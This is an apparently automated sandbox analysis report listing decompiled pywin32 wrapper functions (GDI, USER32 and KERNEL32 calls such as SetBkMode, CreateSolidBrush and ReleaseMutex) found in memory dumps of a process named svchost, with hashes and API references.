                            • PyEval_SaveThread.PYTHON38 ref: 6DAB3908
                            • GetMenuItemID.USER32(?,?), ref: 6DAB3918
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB3921
                            • Py_BuildValue.PYTHON38(6DABF4A8,00000000), ref: 6DAB392D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildItemMenuObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: Oi:GetMenuItemID
                            • API String ID: 406585752-17796478
                            • Opcode ID: c77f9f7264bd2fe5ee429a85e2759083a93827f491833c1c6d26901e74eb95a7
                            • Instruction ID: 07d583dac981f97bb43115db6eb0d2aa5f761a00c58dd08bbec671281b55a798
                            • Opcode Fuzzy Hash: c77f9f7264bd2fe5ee429a85e2759083a93827f491833c1c6d26901e74eb95a7
                            • Instruction Fuzzy Hash: BFF08135408201AFDB005B65DD49A6B7BB8FF85611F048929FC85C1131E735895ADA93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi:SetBkMode,?,?), ref: 6DAB483D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB4859
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB4868
                            • SetBkMode.GDI32(?,?), ref: 6DAB4878
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB4881
                            • Py_BuildValue.PYTHON38(6DAC28FC,00000000), ref: 6DAB488D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildModeObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: Oi:SetBkMode
                            • API String ID: 2486815254-475507012
                            • Opcode ID: 9f2012c3c3255444ba3380fd17b8fbf399cf3dee342b32f5ec09866a0501bd54
                            • Instruction ID: c04260f6be7cc5f5270b8263667c10bc591ab8b58ea1df7358ab84baabb6d097
                            • Opcode Fuzzy Hash: 9f2012c3c3255444ba3380fd17b8fbf399cf3dee342b32f5ec09866a0501bd54
                            • Instruction Fuzzy Hash: 2EF08C35408201AFDB009F65ED49B6B7BB8FF85215F448929FC89C1121E735896ADB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetViewportExtEx), ref: 6DAA9DD0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA9DEC
                            • GetViewportExtEx.GDI32(?,?), ref: 6DAA9E02
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetViewportExtEx,00000000), ref: 6DAA9E12
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParseTupleViewportWin_
                            • String ID: GetViewportExtEx$O:GetViewportExtEx
                            • API String ID: 366590044-2489111063
                            • Opcode ID: 59960905f6c6165f2b1be53403a1cb323cc9f0163d9f0596f754339da0160c5c
                            • Instruction ID: 8a557dbc9623adfd002190115f76bbd23cc6fd0ef4891853fa84866d56b6ce2e
                            • Opcode Fuzzy Hash: 59960905f6c6165f2b1be53403a1cb323cc9f0163d9f0596f754339da0160c5c
                            • Instruction Fuzzy Hash: BCF0187540C201BFDF016B55CD4597A7BB9FF84205F888964FC59C0132F7368A6ADA52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAB55D0(intOrPtr _a8) {
                            				long _v4;
                            				void* __ecx;
                            				void* _t3;
                            				struct HBRUSH__* _t4;
                            				void* _t6;
                            				void* _t7;
                            				struct HBRUSH__* _t8;
                            				void* _t11;
                            				void* _t15;
                            
                            				_t3 = _t15;
                            				__imp__PyArg_ParseTuple(_a8, "l:CreateSolidBrush", _t3);
                            				if(_t3 != 0) {
                            					__imp__PyEval_SaveThread(_t7, _t11);
                            					_t4 = CreateSolidBrush(_v4);
                            					_t8 = _t4;
                            					__imp__PyEval_RestoreThread(_t3);
                            					if(_t8 != 0) {
                            						return E6DAA5630(_t6, _t8);
                            					} else {
                            						__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CreateSolidBrush", _t8);
                            						return _t4;
                            					}
                            				} else {
                            					return _t3;
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,l:CreateSolidBrush), ref: 6DAB55DE
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB55EF
                            • CreateSolidBrush.GDI32(?), ref: 6DAB55FB
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB5604
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CreateSolidBrush,00000000), ref: 6DAB5617
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BrushCreateError@@ParseRestoreSaveSolidTupleU_object@@Win_
                            • String ID: CreateSolidBrush$l:CreateSolidBrush
                            • API String ID: 1260461327-1421391186
                            • Opcode ID: 85828022c41db3f41713e1de5760c61207aec09f9ceb5c258cfa0d1dac099153
                            • Instruction ID: a45b8372f687a43457f554836e62a1ae6b9109503d2d06b5f29377171e46e999
                            • Opcode Fuzzy Hash: 85828022c41db3f41713e1de5760c61207aec09f9ceb5c258cfa0d1dac099153
                            • Instruction Fuzzy Hash: E8F0E97640C2005FCA012B65FC4C97B3B7DEEC2273B184539F806C1111E731856B96A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,ii:SetCaretPos,?), ref: 6DAB0525
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB0538
                            • SetCaretPos.USER32(?,?), ref: 6DAB0548
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB0551
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetCaretPos,00000000), ref: 6DAB0567
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_CaretError@@ParseRestoreSaveTupleU_object@@Win_
                            • String ID: SetCaretPos$ii:SetCaretPos
                            • API String ID: 575990338-310743985
                            • Opcode ID: f772bc260c287ccd3612ce51784172e32b84c514c3d3e54ee8cbbdebee33ba84
                            • Instruction ID: 6205213c0a0d429333b200a4395ed4c53c31c65b71723c305bb7c552096b5c15
                            • Opcode Fuzzy Hash: f772bc260c287ccd3612ce51784172e32b84c514c3d3e54ee8cbbdebee33ba84
                            • Instruction Fuzzy Hash: 6EF06276808201AFCF016F65EC45A6A7AB9FF41342F488625FC45D1121E731892BDAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetWindowExtEx), ref: 6DAA9CC0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA9CDC
                            • GetWindowExtEx.GDI32(?,?), ref: 6DAA9CF2
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetWindowExtEx,00000000), ref: 6DAA9D02
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParseTupleWin_Window
                            • String ID: GetWindowExtEx$O:GetWindowExtEx
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:ImageList_GetImageCount), ref: 6DAAF597
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF5B3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAF5C2
                            • ImageList_GetImageCount.COMCTL32(?), ref: 6DAAF5CE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAF5D7
                            • Py_BuildValue.PYTHON38(6DAC0208,00000000), ref: 6DAAF5E3
                            Strings
                            • O:ImageList_GetImageCount, xrefs: 6DAAF58E
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: Eval_ImageThread$Arg_BuildCountList_Object_ParseRestoreSaveTupleU_object@@Value
                            • String ID: O:ImageList_GetImageCount
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetWindowTextLength), ref: 6DAAE1F7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE213
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAE222
                            • GetWindowTextLengthW.USER32(?), ref: 6DAAE22E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAE237
                            • Py_BuildValue.PYTHON38(6DABC9C8,00000000), ref: 6DAAE243
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildLengthObject_ParseRestoreSaveTextTupleU_object@@ValueWindow
                            • String ID: O:GetWindowTextLength
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetArcDirection), ref: 6DAB45D7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB45F3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB4602
                            • GetArcDirection.GDI32(?), ref: 6DAB460E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB4617
                            • Py_BuildValue.PYTHON38(6DAC208C,00000000), ref: 6DAB4623
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildDirectionObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: O:GetArcDirection
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi:SetGraphicsMode,?,?), ref: 6DAA95E6
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA9602
                            • SetGraphicsMode.GDI32(?,?), ref: 6DAA9617
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetGraphicsMode,00000000), ref: 6DAA9627
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: U_object@@$Arg_Error@@GraphicsModeObject_ParseTupleWin_
                            • String ID: Oi:SetGraphicsMode$SetGraphicsMode
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:IsWindow), ref: 6DAB7917
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7933
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB7942
                            • IsWindow.USER32(?), ref: 6DAB794E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB7957
                            • Py_BuildValue.PYTHON38(6DABDF64,00000000), ref: 6DAB7963
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildObject_ParseRestoreSaveTupleU_object@@ValueWindow
                            • String ID: O:IsWindow
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetBkColor), ref: 6DAB48B7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB48D3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB48E2
                            • GetBkColor.GDI32(?), ref: 6DAB48EE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB48F7
                            • Py_BuildValue.PYTHON38(6DABBB68,00000000), ref: 6DAB4903
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildColorObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: O:GetBkColor
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetMenuItemCount), ref: 6DAB30C7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB30E3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB30F2
                            • GetMenuItemCount.USER32 ref: 6DAB30FE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB3107
                            • Py_BuildValue.PYTHON38(6DABDE5C,00000000), ref: 6DAB3113
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildCountItemMenuObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: O:GetMenuItemCount
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetStretchBltMode), ref: 6DAAF097
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF0B3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAF0C2
                            • GetStretchBltMode.GDI32(?), ref: 6DAAF0CE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAF0D7
                            • Py_BuildValue.PYTHON38(6DABF234,00000000), ref: 6DAAF0E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildModeObject_ParseRestoreSaveStretchTupleU_object@@Value
                            • String ID: O:GetStretchBltMode
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi:SetMapMode,?,?), ref: 6DAA94F6
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA9512
                            • SetMapMode.GDI32(?,?), ref: 6DAA9527
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetMapMode,00000000), ref: 6DAA9537
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: U_object@@$Arg_Error@@ModeObject_ParseTupleWin_
                            • String ID: Oi:SetMapMode$SetMapMode
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,i:MessageBeep), ref: 6DAAFC8E
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAFC9F
                            • MessageBeep.USER32(?), ref: 6DAAFCAB
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAFCB4
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(MessageBeep,00000000), ref: 6DAAFCCA
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: Eval_Thread$Arg_BeepError@@MessageParseRestoreSaveTupleU_object@@Win_
                            • String ID: MessageBeep$i:MessageBeep
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetGraphicsMode), ref: 6DAA9570
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA958C
                            • GetGraphicsMode.GDI32(?), ref: 6DAA959D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetGraphicsMode,00000000), ref: 6DAA95AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: U_object@@$Arg_Error@@GraphicsModeObject_ParseTupleWin_
                            • String ID: GetGraphicsMode$O:GetGraphicsMode
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiOO:MsgWaitForMultipleObjects,?,?,?), ref: 6DA91817
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA91839
                            • PyErr_Occurred.PYTHON38 ref: 6DA91845
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA91853
                            • PyErr_Occurred.PYTHON38 ref: 6DA9185F
                            Strings
                            • OiOO:MsgWaitForMultipleObjects, xrefs: 6DA9180E
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Err_LongLong_MaskOccurredUnsigned$Arg_ParseTuple
                            • String ID: OiOO:MsgWaitForMultipleObjects
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_SetString.PYTHON38(6E28ED8C,XFORM must be a dict), ref: 6DAA98AD
                            • PyTuple_New.PYTHON38(00000000), ref: 6DAA98BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: Err_StringTuple_
                            • String ID: XFORM must be a dict$|ffffff
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_SetString.PYTHON38(6E28ED8C,MINIMIZEDMETRICS must be a dict), ref: 6DAAC145
                            • PyTuple_New.PYTHON38(00000000), ref: 6DAAC156
                            Strings
                            • MINIMIZEDMETRICS must be a dict, xrefs: 6DAAC13E
                            • iiii:MINIMIZEDMETRICS, xrefs: 6DAAC17E
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            Similarity
                            • API ID: Err_StringTuple_
                            • String ID: MINIMIZEDMETRICS must be a dict$iiii:MINIMIZEDMETRICS
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • Py_BuildValue.PYTHON38({s:f,s:f,s:f,s:f,s:f,s:f},M11,?,M12,?,M21,?,M22,?,6DABD298,?,6DABD294), ref: 6DAA99A6
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: BuildValue
                            • String ID: M11$M12$M21$M22${s:f,s:f,s:f,s:f,s:f,s:f}
                            • API String ID: 3383912721-503291249
                            • Opcode ID: d897dc85211c21d54dcb20212d36ccf6118e2aaf5392c664f9f4c9eaeb833090
                            • Instruction ID: 09b44cc4273a6edd6cd9026c7c2feaba8b225d30a9129f76e84d1b56898be64d
                            • Opcode Fuzzy Hash: d897dc85211c21d54dcb20212d36ccf6118e2aaf5392c664f9f4c9eaeb833090
                            • Instruction Fuzzy Hash: 41012C34D28A458EC601EE3A8914869FB79BEDF101B458729F4827D022F72494CADB83
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:ReleaseMutex), ref: 6DA91DB7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA91DD3
                            • ReleaseMutex.KERNEL32(?), ref: 6DA91DE4
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ReleaseMutex,00000000), ref: 6DA91DF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@MutexObject_ParseReleaseTupleWin_
                            • String ID: O:ReleaseMutex$ReleaseMutex
                            • API String ID: 1893467422-470454261
                            • Opcode ID: 6b2df3e31e6e215ec83d73cc7419d6a3479d87d220510633eccda6112f0ddf23
                            • Instruction ID: 673051fe33f6f31fcc2f7d5172b8780cad255051ac13005dea92418cffe7ebb7
                            • Opcode Fuzzy Hash: 6b2df3e31e6e215ec83d73cc7419d6a3479d87d220510633eccda6112f0ddf23
                            • Instruction Fuzzy Hash: 91F0B47442C201AFDF006B14ED0573A37F8FF85206F444434FC94C9111F776856ADA6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CancelWaitableTimer), ref: 6DA913C7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA913E3
                            • CancelWaitableTimer.KERNEL32(?), ref: 6DA913F4
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CancelWaitableTimer,00000000), ref: 6DA91404
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_CancelError@@Object_ParseTimerTupleWaitableWin_
                            • String ID: CancelWaitableTimer$O:CancelWaitableTimer
                            • API String ID: 2426573516-3766281208
                            • Opcode ID: ae24a565fb7491a688067f38c3a00b2e2f707c440366338e274cb184b5efe134
                            • Instruction ID: fe1dfe772aa0d316b096abda825c82a837433a0b127c260d1ee5dd66a29235d7
                            • Opcode Fuzzy Hash: ae24a565fb7491a688067f38c3a00b2e2f707c440366338e274cb184b5efe134
                            • Instruction Fuzzy Hash: D5F0F07802C2019FCF005B25EC0573637F8BF49206F444434EC58C4111F7798529DA6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:SetEvent), ref: 6DA91F97
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA91FB3
                            • SetEvent.KERNEL32(?), ref: 6DA91FC4
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetEvent,00000000), ref: 6DA91FD4
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@EventObject_ParseTupleWin_
                            • String ID: O:SetEvent$SetEvent
                            • API String ID: 1430807653-2155133661
                            • Opcode ID: 5cf6a5b119e54584d6f78a4893fcbf2eef8364868a7372994db178b7ed5e86cf
                            • Instruction ID: 93ea9419cab68a52fa7cb50f419917d1c777aaa28765e5684be3b46fc8dc5300
                            • Opcode Fuzzy Hash: 5cf6a5b119e54584d6f78a4893fcbf2eef8364868a7372994db178b7ed5e86cf
                            • Instruction Fuzzy Hash: 97F0907441C2019FDF006B64ED05B363BF8BF84206F484434E854C9111F7798569DA6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:PulseEvent), ref: 6DA91D47
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA91D63
                            • PulseEvent.KERNEL32(?), ref: 6DA91D74
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(PulseEvent,00000000), ref: 6DA91D84
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@EventObject_ParsePulseTupleWin_
                            • String ID: O:PulseEvent$PulseEvent
                            • API String ID: 1349761666-1674517046
